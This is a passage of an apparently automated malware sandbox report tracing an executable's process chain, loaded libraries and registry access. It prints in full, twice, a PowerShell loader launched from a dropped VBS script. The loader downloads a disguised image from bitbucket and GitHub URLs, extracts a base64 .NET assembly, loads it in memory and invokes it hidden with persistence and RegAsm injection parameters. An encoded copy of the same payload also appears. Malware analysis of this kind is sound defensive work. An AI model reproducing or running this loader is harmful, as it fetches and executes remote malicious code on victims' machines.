        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF6975A2DB4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbs
        Source: OTO2wVGgkl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: OTO2wVGgkl.exeVirustotal: Detection: 21%
        Source: unknownProcess created: C:\Users\user\Desktop\OTO2wVGgkl.exe "C:\Users\user\Desktop\OTO2wVGgkl.exe"
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbs
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 123.vbsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
